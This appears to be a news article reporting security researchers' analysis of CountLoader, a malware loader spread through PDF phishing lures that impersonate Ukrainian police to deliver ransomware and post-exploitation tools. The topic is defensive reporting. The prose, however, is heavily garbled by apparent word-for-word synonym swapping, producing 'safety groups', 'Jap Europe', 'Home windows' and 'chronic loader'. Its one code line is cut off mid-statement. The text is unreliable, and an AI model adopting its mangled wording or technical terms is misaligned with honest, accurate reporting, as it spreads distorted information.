In current months, safety groups have noticed the emergence of a complicated malware loader, dubbed CountLoader, which leverages weaponized PDF information to ship ransomware payloads.
First detected in late August 2025, CountLoader is linked to a number of Russian-speaking cybercriminal teams, together with associates of LockBit, BlackBasta, and Qilin.
By masquerading as official paperwork—usually impersonating Ukrainian legislation enforcement—this loader takes benefit of social engineering and PDF exploit chains to realize an preliminary foothold in goal environments.
CountLoader’s deployment methodology revolves round three distinct variations written in JScript (.hta), .NET, and PowerShell.
Every variant displays distinctive attributes: the JScript model affords essentially the most complete performance with a number of obtain and execution strategies, the .NET binary enforces a hardcoded kill change after a preset date, and the PowerShell script persists as a concise loader with reflective in-memory execution.
Silent Push analysts famous that each one variants incorporate a customized C2 communication protocol using XOR and Base64 encryption routines to hide their management site visitors.
The affect of CountLoader extends far past mere preliminary entry. Upon profitable execution, the loader fingerprinted device-specific particulars—akin to {hardware} identifiers, area membership, and antivirus product presence—to generate a novel sufferer ID.
It then engages in persistent C2 polling loops, downloading secondary payloads akin to Cobalt Strike beacons, Adaptix implants, and pureHVNC backdoors.
Organizations with domain-joined programs in Jap Europe have been the first targets, suggesting strategic collection of company and governmental entities.
PDF lure impersonating the Ukrainian police (Supply – Silent Push)
CountLoader was notably delivered by way of a PDF-based phishing lure impersonating the Nationwide Police of Ukraine. The malicious PDF contained an embedded HTML utility object that triggered mshta.exe to fetch and execute the JScript loader.
Upon opening the doc, victims encountered an official-looking notification instructing them to “begin your request” by way of an embedded hyperlink, which initiated the loader obtain course of.
An infection Mechanism
CountLoader’s an infection mechanism begins with the weaponized PDF exploiting consumer interplay slightly than zero-day vulnerabilities.
The PDF embeds an HTA object that invokes the Home windows mshta engine when clicked.
This HTA script is obfuscated utilizing a free JavaScript obfuscator and accommodates round 850 traces of code.
Main perform (Supply – Silent Push)
After deobfuscation, the principle loop liable for C2 contact is seen:
for (let i = 1; i
Upon profitable contact, CountLoader leverages HTTP POST requests with customized Bearer tokens obtained from the C2 to fetch duties.
These duties embody downloading executables by way of WinHTTP, MSXML2, Curl, Bitsadmin, or Certutil, demonstrating the loader’s adaptability and deep system data.
As soon as duties are executed, CountLoader reviews completion again to the server, making certain strong activity administration.
This an infection workflow underscores CountLoader’s design as a extremely modular and chronic loader, able to delivering various ransomware and post-exploitation instruments whereas evading detection via obfuscation and encrypted communications.
Discover this Story Fascinating! Comply with us on Google Information, LinkedIn, and X to Get Extra On the spot Updates.
